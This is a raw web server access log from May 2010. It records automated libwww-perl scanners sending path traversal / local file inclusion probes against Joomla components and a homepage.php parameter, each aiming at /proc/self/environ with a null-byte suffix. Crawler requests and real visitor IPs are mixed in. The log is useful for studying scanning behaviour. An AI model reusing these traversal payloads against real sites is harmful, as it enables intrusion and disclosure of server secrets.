121.78.118.123 - - [15/May/2010:17:19:35 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [15/May/2010:17:19:36 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
109.123.72.130 - - [15/May/2010:17:20:08 -0500] "GET /logs/access_log.1273190400/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
109.123.72.130 - - [15/May/2010:17:20:08 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
109.123.72.130 - - [15/May/2010:17:20:09 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
84.48.202.208 - - [15/May/2010:17:23:25 -0500] "GET /logs/access_log.1247184000 HTTP/1.1" 404 310 "http://www.google.no/url?sa=t&source=web&ct=res&cd=3&ved=0CB0QFjAC&url=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1247184000&rct=j&q=+%22HEAD+%2F+HTTP%2F1.1%22+200+-+%22-%22+%22Sphider%22++++++joomla+++&ei=5B7vS-_iNselOM-TwJYI&usg=AFQjCNEtiOQ2dSZU4nlz7ZbqTQimNYKgsw&sig2=-cE06XOI7UfTzfoffVCr4g""Mozilla/5.0 (Windows; U; Windows NT 6.0; nb-NO; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
84.48.202.208 - - [15/May/2010:17:23:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; nb-NO; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
84.48.202.208 - - [15/May/2010:17:23:29 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; nb-NO; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
87.250.255.243 - - [15/May/2010:17:26:06 -0500] "GET /logs/access_log.1223596800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
109.123.72.130 - - [15/May/2010:17:28:29 -0500] "GET /logs/access_log.1273190400/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
109.123.72.130 - - [15/May/2010:17:28:30 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
109.123.72.130 - - [15/May/2010:17:28:30 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
211.43.201.70 - - [15/May/2010:17:29:19 -0500] "GET /logs/access_log.1273190400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:17:30:50 -0500] "GET /logs/access_log.1273190400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:17:32:43 -0500] "GET /logs/access_log.1177804800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.184 - - [15/May/2010:17:34:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.234 - - [15/May/2010:17:34:39 -0500] "GET /logs/access_log.1242172800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [15/May/2010:17:38:39 -0500] "GET /logs/access_log.1232236800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.55.52.154 - - [15/May/2010:17:41:40 -0500] "GET /homepage.php?sel=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-"""
74.55.52.154 - - [15/May/2010:17:41:41 -0500] "GET /homepage.php?sel=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-"""
74.55.52.154 - - [15/May/2010:17:41:41 -0500] "GET /homepage.php?sel=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-"""
74.55.52.154 - - [15/May/2010:17:41:41 -0500] "GET /logs/homepage.php?sel=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-"""
74.55.52.154 - - [15/May/2010:17:41:41 -0500] "GET /logs/homepage.php?sel=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""